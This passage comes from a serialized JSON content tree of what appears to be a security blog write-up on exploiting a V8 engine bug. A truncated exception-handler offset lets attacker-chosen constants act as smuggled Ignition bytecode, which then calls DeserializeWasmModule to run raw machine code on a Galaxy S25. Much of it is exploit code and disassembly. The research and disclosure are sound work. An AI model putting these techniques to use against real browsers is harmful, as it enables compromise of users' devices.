36262},{"style":6947},[136263],{"type":31,"value":94681},{"type":25,"tag":216,"props":136265,"children":136266},{"style":6953},[136267],{"type":31,"value":6956},{"type":25,"tag":216,"props":136269,"children":136270},{"style":6989},[136271],{"type":31,"value":11886},{"type":25,"tag":216,"props":136273,"children":136274},{"style":6964},[136275],{"type":31,"value":6967},{"type":25,"tag":216,"props":136277,"children":136278},{"class":6922,"line":7110},[136279],{"type":25,"tag":216,"props":136280,"children":136281},{"style":6964},[136282],{"type":31,"value":7874},{"type":25,"tag":206,"props":136284,"children":136286},{"code":136285}," 0 : 1b ff f8          Mov \u003Ccontext>, r1\n # Start of try block\n # ---------------------------------\n 3 : 0d 01             LdaSmi [1]\n 5 : b1                Throw\n # ---------------------------------\n 6 : 10                LdaTheHole\n 7 : b0                SetPendingMessage\n # Start of catch handler\n 8 : 0d 02             LdaSmi [2]\n10 : ce                Star0\n11 : 0e                LdaUndefined\n12 : b3                Return\nHandler Table (size = 16)\n   from   to       hdlr (prediction,   data)\n  (   3,   6)  ->     6 (prediction=1, data=1)\n",[136287],{"type":25,"tag":82,"props":136288,"children":136289},{"__ignoreMap":7},[136290],{"type":31,"value":136285},{"type":25,"tag":38,"props":136292,"children":136293},{},[136294,136296,136301,136303,136308],{"type":31,"value":136295},"However, the ",{"type":25,"tag":82,"props":136297,"children":136299},{"className":136298},[],[136300],{"type":31,"value":136202},{"type":31,"value":136302}," offset is stored in a 28-bit bitfield. If the address of the ",{"type":25,"tag":82,"props":136304,"children":136306},{"className":136305},[],[136307],{"type":31,"value":52380},{"type":31,"value":136309}," block does not fit within 28 bits, it will be silently truncated. This will lead to a jump into a completely different part of the code - even in the middle of an instruction.",{"type":25,"tag":38,"props":136311,"children":136312},{},[136313,136315,136321],{"type":31,"value":136314},"One easy way to generate a large enough function, as suggested in the initial report, is to emit many ",{"type":25,"tag":82,"props":136316,"children":136318},{"className":136317},[],[136319],{"type":31,"value":136320},"yield*",{"type":31,"value":136322}," statements, as that drastically increases the size of the Ignition bytecode.",{"type":25,"tag":26,"props":136324,"children":136326},{"id":136325},"exploitation",[136327],{"type":31,"value":136328},"Exploitation",{"type":25,"tag":606,"props":136330,"children":136332},{"id":136331},"constant-smuggling",[136333],{"type":31,"value":136334},"Constant Smuggling",{"type":25,"tag":38,"props":136336,"children":136337},{},[136338,136340,136347],{"type":31,"value":136339},"Our initial approach to exploitation was inspired by the 'shellcode smuggling' ",{"type":25,"tag":162,"props":136341,"children":136344},{"href":136342,"rel":136343},"https://blog.exodusintel.com/2024/01/19/google-chrome-v8-cve-2024-0517-out-of-bounds-write-code-execution/",[166],[136345],{"type":31,"value":136346},"technique",{"type":31,"value":136348}," - when arbitrary read-write is achieved in browser exploits, we can often JIT compile a function like this:",{"type":25,"tag":206,"props":136350,"children":136352},{"code":136351,"language":35327,"meta":7,"className":35325,"style":7},"let a = -9.255963134931783e61;\nlet b = -9.255963134931783e61;\nlet c = -9.255963134931783e61;\nlet d = -9.255963134931783e61;\n",[136353],{"type":25,"tag":82,"props":136354,"children":136355},{"__ignoreMap":7},[136356,136384,136411,136438],{"type":25,"tag":216,"props":136357,"children":136358},{"class":6922,"line":6923},[136359,136363,136367,136371,136375,136380],{"type":25,"tag":216,"props":136360,"children":136361},{"style":6936},[136362],{"type":31,"value":15743},{"type":25,"tag":216,"props":136364,"children":136365},{"style":6947},[136366],{"type":31,"value":93807},{"type":25,"tag":216,"props":136368,"children":136369},{"style":6953},[136370],{"type":31,"value":6956},{"type":25,"tag":216,"props":136372,"children":136373},{"style":6953},[136374],{"type":31,"value":55224},{"type":25,"tag":216,"props":136376,"children":136377},{"style":6989},[136378],{"type":31,"value":136379},"9.255963134931783e61",{"type":25,"tag":216,"props":136381,"children":136382},{"style":6964},[136383],{"type":31,"value":6967},{"type":25,"tag":216,"props":136385,"children":136386},{"class":6922,"line":6769},[136387,136391,136395,136399,136403,136407],{"type":25,"tag":216,"props":136388,"children":136389},{"style":6936},[136390],{"type":31,"value":15743},{"type":25,"tag":216,"props":136392,"children":136393},{"style":6947},[136394],{"type":31,"value":94681},{"type":25,"tag":216,"props":136396,"children":136397},{"style":6953},[136398],{"type":31,"value":6956},{"type":25,"tag":216,"props":136400,"children":136401},{"style":6953},[136402],{"type":31,"value":55224},{"type":25,"tag":216,"props":136404,"children":136405},{"style":6989},[136406],{"type":31,"value":136379},{"type":25,"tag":216,"props":136408,"children":136409},{"style":6964},[136410],{"type":31,"value":6967},{"type":25,"tag":216,"props":136412,"children":136413},{"class":6922,"line":6778},[136414,136418,136422,136426,136430,136434],{"type":25,"tag":216,"props":136415,"children":136416},{"style":6936},[136417],{"type":31,"value":15743},{"type":25,"tag":216,"props":136419,"children":136420},{"style":6947},[136421],{"type":31,"value":41408},{"type":25,"tag":216,"props":136423,"children":136424},{"style":6953},[136425],{"type":31,"value":6956},{"type":25,"tag":216,"props":136427,"children":136428},{"style":6953},[136429],{"type":31,"value":55224},{"type":25,"tag":216,"props":136431,"children":136432},{"style":6989},[136433],{"type":31,"value":136379},{"type":25,"tag":216,"props":136435,"children":136436},{"style":6964},[136437],{"type":31,"value":6967},{"type":25,"tag":216,"props":136439,"children":136440},{"class":6922,"line":7005},[136441,136445,136449,136453,136457,136461],{"type":25,"tag":216,"props":136442,"children":136443},{"style":6936},[136444],{"type":31,"value":15743},{"type":25,"tag":216,"props":136446,"children":136447},{"style":6947},[136448],{"type":31,"value":136147},{"type":25,"tag":216,"props":136450,"children":136451},{"style":6953},[136452],{"type":31,"value":6956},{"type":25,"tag":216,"props":136454,"children":136455},{"style":6953},[136456],{"type":31,"value":55224},{"type":25,"tag":216,"props":136458,"children":136459},{"style":6989},[136460],{"type":31,"value":136379},{"type":25,"tag":216,"props":136462,"children":136463},{"style":6964},[136464],{"type":31,"value":6967},{"type":25,"tag":38,"props":136466,"children":136467},{},[136468],{"type":31,"value":136469},"These floating-point constants will compile to 8-byte constants inside the machine code (the last 2 of which are used to jump into the next constant).",{"type":25,"tag":38,"props":136471,"children":136472},{},[136473],{"type":31,"value":136474},"We'll use a similar principle here, although much more limited. With",{"type":25,"tag":206,"props":136476,"children":136478},{"code":136477},"let a = 0x0693bebe;\n",[136479],{"type":25,"tag":82,"props":136480,"children":136481},{"__ignoreMap":7},[136482],{"type":31,"value":136477},{"type":25,"tag":38,"props":136484,"children":136485},{},[136486],{"type":31,"value":136487},"We will compile the bytecode:",{"type":25,"tag":206,"props":136489,"children":136491},{"code":136490},"01 0d be be 93 06 LdaSmi.ExtraWide\n",[136492],{"type":25,"tag":82,"props":136493,"children":136494},{"__ignoreMap":7},[136495],{"type":31,"value":136490},{"type":25,"tag":38,"props":136497,"children":136498},{},[136499,136501,136507,136509,136515,136516,136522],{"type":31,"value":136500},"We can then jump to the 3rd byte (",{"type":25,"tag":82,"props":136502,"children":136504},{"className":136503},[],[136505],{"type":31,"value":136506},"0xbe",{"type":31,"value":136508},"), and gain 2 controlled bytes of execution, followed by ",{"type":25,"tag":82,"props":136510,"children":136512},{"className":136511},[],[136513],{"type":31,"value":136514},"0x93 0x02 - 0xf",{"type":31,"value":7016},{"type":25,"tag":82,"props":136517,"children":136519},{"className":136518},[],[136520],{"type":31,"value":136521},"Jump +[2-15]",{"type":31,"value":136523},") to jump into the next constant.",{"type":25,"tag":38,"props":136525,"children":136526},{},[136527,136529,136535,136537,136543,136545,136551],{"type":31,"value":136528},"Note that the jump constant will change as the subsequent store instruction becomes longer due to storing to deeper registers. Storing to registers 1-15 resulted in simple one byte ",{"type":25,"tag":82,"props":136530,"children":136532},{"className":136531},[],[136533],{"type":31,"value":136534},"StarX",{"type":31,"value":136536}," instructions, registers 16-121 resulted in two bytes ",{"type":25,"tag":82,"props":136538,"children":136540},{"className":136539},[],[136541],{"type":31,"value":136542},"Star rX",{"type":31,"value":136544}," instructions, and the next batch resulted in 4 byte ",{"type":25,"tag":82,"props":136546,"children":136548},{"className":136547},[],[136549],{"type":31,"value":136550},"Star.ExtraWide rX",{"type":31,"value":136552}," instructions.",{"type":25,"tag":38,"props":136554,"children":136555},{},[136556,136558,136564],{"type":31,"value":136557},"With these short jumps, we can actually construct a massive jump slide of constants like ",{"type":25,"tag":82,"props":136559,"children":136561},{"className":136560},[],[136562],{"type":31,"value":136563},"0x8931111",{"type":31,"value":1472},{"type":25,"tag":206,"props":136566,"children":136568},{"code":136567,"language":35327,"meta":7,"className":35325,"style":7},"let a206 = 0x8931111;\nlet a207 = 0x8931111;\nlet a208 = 0x8931111;\nlet a209 = 0x8931111;\nlet a210 = 0x8931111;\nlet a211 = 0x8931111;\nlet a212 = 0x8931111;\n",[136569],{"type":25,"tag":82,"props":136570,"children":136571},{"__ignoreMap":7},[136572,136597,136621,136645,136669,136693,136717],{"type":25,"tag":216,"props":136573,"children":136574},{"class":6922,"line":6923},[136575,136579,136584,136588,136593],{"type":25,"tag":216,"props":136576,"children":136577},{"style":6936},[136578],{"type":31,"value":15743},{"type":25,"tag":216,"props":136580,"children":136581},{"style":6947},[136582],{"type":31,"value":136583}," a206",{"type":25,"tag":216,"props":136585,"children":136586},{"style":6953},[136587],{"type":31,"value":6956},{"type":25,"tag":216,"props":136589,"children":136590},{"style":6989},[136591],{"type":31,"value":136592}," 0x8931111",{"type":25,"tag":216,"props":136594,"children":136595},{"style":6964},[136596],{"type":31,"value":6967},{"type":25,"tag":216,"props":136598,"children":136599},{"class":6922,"line":6769},[136600,136604,136609,136613,136617],{"type":25,"tag":216,"props":136601,"children":136602},{"style":6936},[136603],{"type":31,"value":15743},{"type":25,"tag":216,"props":136605,"children":136606},{"style":6947},[136607],{"type":31,"value":136608}," a207",{"type":25,"tag":216,"props":136610,"children":136611},{"style":6953},[136612],{"type":31,"value":6956},{"type":25,"tag":216,"props":136614,"children":136615},{"style":6989},[136616],{"type":31,"value":136592},{"type":25,"tag":216,"props":136618,"children":136619},{"style":6964},[136620],{"type":31,"value":6967},{"type":25,"tag":216,"props":136622,"children":136623},{"class":6922,"line":6778},[136624,136628,136633,136637,136641],{"type":25,"tag":216,"props":136625,"children":136626},{"style":6936},[136627],{"type":31,"value":15743},{"type":25,"tag":216,"props":136629,"children":136630},{"style":6947},[136631],{"type":31,"value":136632}," a208",{"type":25,"tag":216,"props":136634,"children":136635},{"style":6953},[136636],{"type":31,"value":6956},{"type":25,"tag":216,"props":136638,"children":136639},{"style":6989},[136640],{"type":31,"value":136592},{"type":25,"tag":216,"props":136642,"children":136643},{"style":6964},[136644],{"type":31,"value":6967},{"type":25,"tag":216,"props":136646,"children":136647},{"class":6922,"line":7005},[136648,136652,136657,136661,136665],{"type":25,"tag":216,"props":136649,"children":136650},{"style":6936},[136651],{"type":31,"value":15743},{"type":25,"tag":216,"props":136653,"children":136654},{"style":6947},[136655],{"type":31,"value":136656}," a209",{"type":25,"tag":216,"props":136658,"children":136659},{"style":6953},[136660],{"type":31,"value":6956},{"type":25,"tag":216,"props":136662,"children":136663},{"style":6989},[136664],{"type":31,"value":136592},{"type":25,"tag":216,"props":136666,"children":136667},{"style":6964},[136668],{"type":31,"value":6967},{"type":25,"tag":216,"props":136670,"children":136671},{"class":6922,"line":7110},[136672,136676,136681,136685,136689],{"type":25,"tag":216,"props":136673,"children":136674},{"style":6936},[136675],{"type":31,"value":15743},{"type":25,"tag":216,"props":136677,"children":136678},{"style":6947},[136679],{"type":31,"value":136680}," a210",{"type":25,"tag":216,"props":136682,"children":136683},{"style":6953},[136684],{"type":31,"value":6956},{"type":25,"tag":216,"props":136686,"children":136687},{"style":6989},[136688],{"type":31,"value":136592},{"type":25,"tag":216,"props":136690,"children":136691},{"style":6964},[136692],{"type":31,"value":6967},{"type":25,"tag":216,"props":136694,"children":136695},{"class":6922,"line":7216},[136696,136700,136705,136709,136713],{"type":25,"tag":216,"props":136697,"children":136698},{"style":6936},[136699],{"type":31,"value":15743},{"type":25,"tag":216,"props":136701,"children":136702},{"style":6947},[136703],{"type":31,"value":136704}," a211",{"type":25,"tag":216,"props":136706,"children":136707},{"style":6953},[136708],{"type":31,"value":6956},{"type":25,"tag":216,"props":136710,"children":136711},{"style":6989},[136712],{"type":31,"value":136592},{"type":25,"tag":216,"props":136714,"children":136715},{"style":6964},[136716],{"type":31,"value":6967},{"type":25,"tag":216,"props":136718,"children":136719},{"class":6922,"line":7244},[136720,136724,136729,136733,136737],{"type":25,"tag":216,"props":136721,"children":136722},{"style":6936},[136723],{"type":31,"value":15743},{"type":25,"tag":216,"props":136725,"children":136726},{"style":6947},[136727],{"type":31,"value":136728}," a212",{"type":25,"tag":216,"props":136730,"children":136731},{"style":6953},[136732],{"type":31,"value":6956},{"type":25,"tag":216,"props":136734,"children":136735},{"style":6989},[136736],{"type":31,"value":136592},{"type":25,"tag":216,"props":136738,"children":136739},{"style":6964},[136740],{"type":31,"value":6967},{"type":25,"tag":38,"props":136742,"children":136743},{},[136744],{"type":31,"value":136745},"Those instructions result in:",{"type":25,"tag":206,"props":136747,"children":136749},{"code":136748},"00: LdaTrue;\n01: LdaTrue;\n02: Jump +8;  >------------+\n04: Star rX + LdaSmi ...   |\nv--------------------------+\n0a: LdaTrue;\n0b: LdaTrue;\n",[136750],{"type":25,"tag":82,"props":136751,"children":136752},{"__ignoreMap":7},[136753],{"type":31,"value":136748},{"type":25,"tag":38,"props":136755,"children":136756},{},[136757,136759,136765,136767,136771],{"type":31,"value":136758},"(The offset of ",{"type":25,"tag":82,"props":136760,"children":136762},{"className":136761},[],[136763],{"type":31,"value":136764},"Jump",{"type":31,"value":136766}," instructions is added to the ",{"type":25,"tag":64,"props":136768,"children":136769},{},[136770],{"type":31,"value":75061},{"type":31,"value":136772}," of the instruction.)",{"type":25,"tag":38,"props":136774,"children":136775},{},[136776,136778,136784],{"type":31,"value":136777},"Now, 3 out of the 6 bytes in a ",{"type":25,"tag":82,"props":136779,"children":136781},{"className":136780},[],[136782],{"type":31,"value":136783},"LdaSmi.ExtraWide",{"type":31,"value":136785}," instruction are valid for merging into the smuggled arbitrary Ignition bytecode. This slide made exploit development a lot easier, as any additional code would cause the exception table to have new offsets.",{"type":25,"tag":606,"props":136787,"children":136789},{"id":136788},"exploit-goal",[136790],{"type":31,"value":136791},"Exploit Goal",{"type":25,"tag":38,"props":136793,"children":136794},{},[136795,136797,136803,136804,136810],{"type":31,"value":136796},"Initially we considered using ",{"type":25,"tag":82,"props":136798,"children":136800},{"className":136799},[],[136801],{"type":31,"value":136802},"Star",{"type":31,"value":5755},{"type":25,"tag":82,"props":136805,"children":136807},{"className":136806},[],[136808],{"type":31,"value":136809},"Ldar",{"type":31,"value":136811}," instructions to store to out-of-bounds register indexes, as registers are stored on the regular stack. However, with only 2 bytes we can only access +/- 0x7f registers, which does not allow us to go out of bounds enough to access interesting values.",{"type":25,"tag":38,"props":136813,"children":136814},{},[136815,136817,136824],{"type":31,"value":136816},"We realized that register offsets 0 and 1 contain the saved frame pointer and return address respectively. We considered using this to ",{"type":25,"tag":162,"props":136818,"children":136821},{"href":136819,"rel":136820},"https://github.com/google/google-ctf/tree/main/2023/quals/sandbox-v8box/solution",[166],[136822],{"type":31,"value":136823},"stack pivot and ROP",{"type":31,"value":136825},". However, there were numerous downsides - primarily, we would need multiple leaks of binary addresses and the JS heap (to construct a buffer with a fake stack frame).",{"type":25,"tag":38,"props":136827,"children":136828},{},[136829],{"type":31,"value":136830},"Additionally, the interpreter expects all values to be tagged V8 values (i.e. 32-bit compressed pointers or Smis). This means that operating on 64-bit addresses can cause surprising truncations or 'untagging' extensions.",{"type":25,"tag":38,"props":136832,"children":136833},{},[136834],{"type":31,"value":136835},"Finally, ROP/stack pivoting-based approaches would cause significant work when porting from our x86_64 development machines to the aarch64 target device, and might not even be feasible given the existence of PAC and BTI on the Galaxy S25.",{"type":25,"tag":38,"props":136837,"children":136838},{},[136839,136841,136847,136849,136855,136857,136863],{"type":31,"value":136840},"At this point, we identified an interesting opcode: ",{"type":25,"tag":82,"props":136842,"children":136844},{"className":136843},[],[136845],{"type":31,"value":136846},"CallRuntime",{"type":31,"value":136848},". Runtime functions are used to implement a lot of core V8 functionality, and are native functions exposed to bytecode (but not to the user, unless ",{"type":25,"tag":82,"props":136850,"children":136852},{"className":136851},[],[136853],{"type":31,"value":136854},"--allow-natives-syntax",{"type":31,"value":136856}," is enabled). Many of these allow powerful functionality as inputs are assumed to be trusted, but one stands out: ",{"type":25,"tag":82,"props":136858,"children":136860},{"className":136859},[],[136861],{"type":31,"value":136862},"DeserializeWasmModule",{"type":31,"value":179},{"type":25,"tag":38,"props":136865,"children":136866},{},[136867,136869,136876,136877,136882,136883,136889,136891,136898],{"type":31,"value":136868},"WebAssembly modules may be internally serialized and deserialized by the runtime - this serialization format includes raw machine code for any ",{"type":25,"tag":162,"props":136870,"children":136873},{"href":136871,"rel":136872},"https://gist.github.com/Riatre/83d5fdb970946c8e185c5e1b2b842b1b",[166],[136874],{"type":31,"value":136875},"JIT-compiled functions",{"type":31,"value":22491},{"type":25,"tag":82,"props":136878,"children":136880},{"className":136879},[],[136881],{"type":31,"value":136862},{"type":31,"value":5755},{"type":25,"tag":82,"props":136884,"children":136886},{"className":136885},[],[136887],{"type":31,"value":136888},"SerializeWasmModule",{"type":31,"value":136890}," themselves are only used from test functions, and indeed have been ",{"type":25,"tag":162,"props":136892,"children":136895},{"href":136893,"rel":136894},"https://chromium-review.googlesource.com/c/v8/v8/+/6875821",[166],[136896],{"type":31,"value":136897},"removed",{"type":31,"value":136899}," from recent production V8 builds due to how abusable this functionality is.",{"type":25,"tag":38,"props":136901,"children":136902},{},[136903,136905,136911,136913,136919,136921,136926,136928,136934,136936,136941,136942,136947,136948,136953,136955,136961,136963,136967],{"type":31,"value":136904},"However, calling this opcode represented a significant challenge:\n",{"type":25,"tag":82,"props":136906,"children":136908},{"className":136907},[],[136909],{"type":31,"value":136910},"CallRuntime \u003Cfunc-id> \u003Cargs> \u003Cargc>",{"type":31,"value":136912},"\nWhere ",{"type":25,"tag":82,"props":136914,"children":136916},{"className":136915},[],[136917],{"type":31,"value":136918},"func-id",{"type":31,"value":136920}," is a 2-byte function ID, ",{"type":25,"tag":82,"props":136922,"children":136924},{"className":136923},[],[136925],{"type":31,"value":42191},{"type":31,"value":136927}," is the index of the last register passed and ",{"type":25,"tag":82,"props":136929,"children":136931},{"className":136930},[],[136932],{"type":31,"value":136933},"argc",{"type":31,"value":136935}," is the number of arguments passed (e.g. passing ",{"type":25,"tag":82,"props":136937,"children":136939},{"className":136938},[],[136940],{"type":31,"value":48348},{"type":31,"value":7026},{"type":25,"tag":82,"props":136943,"children":136945},{"className":136944},[],[136946],{"type":31,"value":48491},{"type":31,"value":1307},{"type":25,"tag":82,"props":136949,"children":136951},{"className":136950},[],[136952],{"type":31,"value":48474},{"type":31,"value":136954}," would be encoded as ",{"type":25,"tag":82,"props":136956,"children":136958},{"className":136957},[],[136959],{"type":31,"value":136960},"\u003Cr2> \u003C3>",{"type":31,"value":136962},").\nThis requires ",{"type":25,"tag":64,"props":136964,"children":136965},{},[136966],{"type":31,"value":22067},{"type":31,"value":136968}," bytes of control - additionally, we must then store the accumulator safely into a register, then return the value back to JS code.",{"type":25,"tag":606,"props":136970,"children":136972},{"id":136971},"better-bytecode-control",[136973],{"type":31,"value":136974},"Better Bytecode Control",{"type":25,"tag":38,"props":136976,"children":136977},{},[136978,136980,136987,136989,136995],{"type":31,"value":136979},"Luckily, arithmetic instructions in Ignition have a feature known as the '",{"type":25,"tag":162,"props":136981,"children":136984},{"href":136982,"rel":136983},"https://benediktmeurer.de/2017/12/13/an-introduction-to-speculative-optimization-in-v8/",[166],[136985],{"type":31,"value":136986},"feedback vector slot",{"type":31,"value":136988},"', where it stores profiling information for subsequent optimizations by Turbofan. Observationally, for the ",{"type":25,"tag":82,"props":136990,"children":136992},{"className":136991},[],[136993],{"type":31,"value":136994},"AddSmi",{"type":31,"value":136996}," instruction, it represents the number of operations performed on the target value so far.",{"type":25,"tag":38,"props":136998,"children":136999},{},[137000],{"type":31,"value":137001},"For example, we can look at the below Ignition disassembly:",{"type":25,"tag":206,"props":137003,"children":137005},{"code":137004},"2000 : 01 0d 11 11 93 0e LdaSmi.ExtraWide [244519185]\n2006 : cd                Star1\n2007 : 00 1b ff ff 1d ff Mov.Wide \u003Ccontext>, r220\n2013 : 0b f8             Ldar r1\n2015 : 01 4b 11 11 93 0a 01 00 00 00 AddSmi.ExtraWide [177410321], [1]\n2025 : 0b f8             Ldar r1\n2027 : 01 4b 11 11 93 0a 02 00 00 00 AddSmi.ExtraWide [177410321], [2]\n2037 : 0b f8             Ldar r1\n2039 : 01 4b 11 11 93 0a 03 00 00 00 AddSmi.ExtraWide [177410321], [3]\n2049 : 0b f8             Ldar r1\n2051 : 01 4b 11 11 93 0a 04 00 00 00 AddSmi.ExtraWide [177410321], [4]\n2061 : 0b f8             Ldar r1\n2063 : 01 4b 11 11 93 0a 05 00 00 00 AddSmi.ExtraWide [177410321], [5]\n",[137006],{"type":25,"tag":82,"props":137007,"children":137008},{"__ignoreMap":7},[137009],{"type":31,"value":137004},{"type":25,"tag":38,"props":137011,"children":137012},{},[137013,137015,137021],{"type":31,"value":137014},"We can see the feedback vector slot increments for every operation. This means that with a smuggled jump slide through ",{"type":25,"tag":82,"props":137016,"children":137018},{"className":137017},[],[137019],{"type":31,"value":137020},"AddSmi.ExtraWide",{"type":31,"value":137022},", we can control almost 8 bytes (because of the SMI constraint) given enough addition instructions.",{"type":25,"tag":38,"props":137024,"children":137025},{},[137026],{"type":31,"value":137027},"Eventually, we can reach a stage like this:",{"type":25,"tag":206,"props":137029,"children":137031},{"code":137030},"4385774 : 01 4b 6c 66 02 04 02 93 05 00 AddSmi.ExtraWide [67266156], [365314]\n",[137032],{"type":25,"tag":82,"props":137033,"children":137034},{"__ignoreMap":7},[137035],{"type":31,"value":137030},{"type":25,"tag":38,"props":137037,"children":137038},{},[137039],{"type":31,"value":137040},"If you skip the first two bytes, you have",{"type":25,"tag":2039,"props":137042,"children":137043},{},[137044,137075],{"type":25,"tag":2043,"props":137045,"children":137046},{},[137047,137052,137054,137059,137061,137067,137069],{"type":25,"tag":82,"props":137048,"children":137050},{"className":137049},[],[137051],{"type":31,"value":136846},{"type":31,"value":137053}," (0x6c) to ",{"type":25,"tag":82,"props":137055,"children":137057},{"className":137056},[],[137058],{"type":31,"value":136862},{"type":31,"value":137060}," (0x0266) starting from register ",{"type":25,"tag":82,"props":137062,"children":137064},{"className":137063},[],[137065],{"type":31,"value":137066},"a2",{"type":31,"value":137068}," (0x4) with 2 arguments (0x2). This becomes the call: ",{"type":25,"tag":82,"props":137070,"children":137072},{"className":137071},[],[137073],{"type":31,"value":137074},"DeserializeWasmModule(a2, a1)",{"type":25,"tag":2043,"props":137076,"children":137077},{},[137078],{"type":31,"value":137079},"a Jump instruction",{"type":25,"tag":606,"props":137081,"children":137083},{"id":137082},"returning-back-to-js",[137084],{"type":31,"value":137085},"Returning Back to JS",{"type":25,"tag":38,"props":137087,"children":137088},{},[137089,137091,137097],{"type":31,"value":137090},"After that call, the result is stored in the accumulator. Since this function is an async generator, we have to ",{"type":25,"tag":82,"props":137092,"children":137094},{"className":137093},[],[137095],{"type":31,"value":137096},"yield",{"type":31,"value":137098}," the result, but that results in a long series of instructions that we can't possibly smuggle.",{"type":25,"tag":38,"props":137100,"children":137101},{},[137102],{"type":31,"value":137103},"The solution here is simple: we use the smuggled control flow to merge back into the normal control flow, that leads us into a yield from the original JS. For example, in our exploit, all the additions were done in a try block:",{"type":25,"tag":206,"props":137105,"children":137107},{"code":137106,"language":35327,"meta":7,"className":35325,"style":7},"try {\n  ${'a1 + 0xa931111;'.repeat(0x059302 - 1)}\n  a1 + 0x0402666c;\n  throw 0x393e91a;\n} catch (e) {\n  console.log(\"foo\");\n  yield a16;\n}\n",[137108],{"type":25,"tag":82,"props":137109,"children":137110},{"__ignoreMap":7},[137111,137122,137170,137191,137207,137230,137258,137275],{"type":25,"tag":216,"props":137112,"children":137113},{"class":6922,"line":6923},[137114,137118],{"type":25,"tag":216,"props":137115,"children":137116},{"style":6973},[137117],{"type":31,"value":52300},{"type":25,"tag":216,"props":137119,"children":137120},{"style":6964},[137121],{"type":31,"value":7241},{"type":25,"tag":216,"props":137123,"children":137124},{"class":6922,"line":6769},[137125,137130,137134,137139,137143,137148,137152,137157,137161,137165],{"type":25,"tag":216,"props":137126,"children":137127},{"style":6947},[137128],{"type":31,"value":137129},"  $",{"type":25,"tag":216,"props":137131,"children":137132},{"style":6964},[137133],{"type":31,"value":80590},{"type":25,"tag":216,"props":137135,"children":137136},{"style":8205},[137137],{"type":31,"value":137138},"'a1 + 0xa931111;'",{"type":25,"tag":216,"props":137140,"children":137141},{"style":6964},[137142],{"type":31,"value":179},{"type":25,"tag":216,"props":137144,"children":137145},{"style":7047},[137146],{"type":31,"value":137147},"repeat",{"type":25,"tag":216,"props":137149,"children":137150},{"style":6964},[137151],{"type":31,"value":1850},{"type":25,"tag":216,"props":137153,"children":137154},{"style":6989},[137155],{"type":31,"value":137156},"0x059302",{"type":25,"tag":216,"props":137158,"children":137159},{"style":6953},[137160],{"type":31,"value":55224},{"type":25,"tag":216,"props":137162,"children":137163},{"style":6989},[137164],{"type":31,"value":8471},{"type":25,"tag":216,"props":137166,"children":137167},{"style":6964},[137168],{"type":31,"value":137169},")}\n",{"type":25,"tag":216,"props":137171,"children":137172},{"class":6922,"line":6778},[137173,137178,137182,137187],{"type":25,"tag":216,"props":137174,"children":137175},{"style":6947},[137176],{"type":31,"value":137177},"  a1",{"type":25,"tag":216,"props":137179,"children":137180},{"style":6953},[137181],{"type":31,"value":12858},{"type":25,"tag":216,"props":137183,"children":137184},{"style":6989},[137185],{"type":31,"value":137186}," 0x0402666c",{"type":25,"tag":216,"props":137188,"children":137189},{"style":6964},[137190],{"type":31,"value":6967},{"type":25,"tag":216,"props":137192,"children":137193},{"class":6922,"line":7005},[137194,137198,137203],{"type":25,"tag":216,"props":137195,"children":137196},{"style":6973},[137197],{"type":31,"value":39165},{"type":25,"tag":216,"props":137199,"children":137200},{"style":6989},[137201],{"type":31,"value":137202}," 0x393e91a",{"type":25,"tag":216,"props":137204,"children":137205},{"style":6964},[137206],{"type":31,"value":6967},{"type":25,"tag":216,"props":137208,"children":137209},{"class":6922,"line":7110},[137210,137214,137218,137222,137226],{"type":25,"tag":216,"props":137211,"children":137212},{"style":6964},[137213],{"type":31,"value":50842},{"type":25,"tag":216,"props":137215,"children":137216},{"style":6973},[137217],{"type":31,"value":52380},{"type":25,"tag":216,"props":137219,"children":137220},{"style":6964},[137221],{"type":31,"value":7016},{"type":25,"tag":216,"props":137223,"children":137224},{"style":6947},[137225],{"type":31,"value":2399},{"type":25,"tag":216,"props":137227,"children":137228},{"style":6964},[137229],{"type":31,"value":18761},{"type":25,"tag":216,"props":137231,"children":137232},{"class":6922,"line":7216},[137233,137237,137241,137245,137249,137254],{"type":25,"tag":216,"props":137234,"children":137235},{"style":6947},[137236],{"type":31,"value":105902},{"type":25,"tag":216,"props":137238,"children":137239},{"style":6964},[137240],{"type":31,"value":179},{"type":25,"tag":216,"props":137242,"children":137243},{"style":7047},[137244],{"type":31,"value":105911},{"type":25,"tag":216,"props":137246,"children":137247},{"style":6964},[137248],{"type":31,"value":1850},{"type":25,"tag":216,"props":137250,"children":137251},{"style":8205},[137252],{"type":31,"value":137253},"\"foo\"",{"type":25,"tag":216,"props":137255,"children":137256},{"style":6964},[137257],{"type":31,"value":7797},{"type":25,"tag":216,"props":137259,"children":137260},{"class":6922,"line":7244},[137261,137266,137271],{"type":25,"tag":216,"props":137262,"children":137263},{"style":6973},[137264],{"type":31,"value":137265},"  yield",{"type":25,"tag":216,"props":137267,"children":137268},{"style":6947},[137269],{"type":31,"value":137270}," a16",{"type":25,"tag":216,"props":137272,"children":137273},{"style":6964},[137274],{"type":31,"value":6967},{"type":25,"tag":216,"props":137276,"children":137277},{"class":6922,"line":7257},[137278],{"type":25,"tag":216,"props":137279,"children":137280},{"style":6964},[137281],{"type":31,"value":7874},{"type":25,"tag":38,"props":137283,"children":137284},{},[137285,137287],{"type":31,"value":137286},"Starting from the final ",{"type":25,"tag":82,"props":137288,"children":137290},{"className":137289},[],[137291],{"type":31,"value":136994},{"type":25,"tag":206,"props":137293,"children":137295},{"code":137294}," 4385774 : 01 4b 6c 66 02 04 02 93 05 00 AddSmi.ExtraWide [67266156], [365314]\n 4385784 : 01 0d 1a e9 93 03 LdaSmi.ExtraWide [60025114]\n 4385790 : b1                Throw\n 4385791 : 00 1a 1a ff       Star.Wide r223\n",[137296],{"type":25,"tag":82,"props":137297,"children":137298},{"__ignoreMap":7},[137299],{"type":31,"value":137294},{"type":25,"tag":38,"props":137301,"children":137302},{},[137303,137305,137310,137312,137318],{"type":31,"value":137304},"The smuggled jump in ",{"type":25,"tag":82,"props":137306,"children":137308},{"className":137307},[],[137309],{"type":31,"value":136994},{"type":31,"value":137311}," will redirect us to ",{"type":25,"tag":82,"props":137313,"children":137315},{"className":137314},[],[137316],{"type":31,"value":137317},"1a e9 93 03",{"type":31,"value":137319},", which results in:",{"type":25,"tag":2039,"props":137321,"children":137322},{},[137323,137334],{"type":25,"tag":2043,"props":137324,"children":137325},{},[137326,137332],{"type":25,"tag":82,"props":137327,"children":137329},{"className":137328},[],[137330],{"type":31,"value":137331},"Star r16",{"type":31,"value":137333}," (store accumulator to r16)",{"type":25,"tag":2043,"props":137335,"children":137336},{},[137337,137342],{"type":25,"tag":82,"props":137338,"children":137340},{"className":137339},[],[137341],{"type":31,"value":136764},{"type":31,"value":137343}," past the throw into the catch relevant 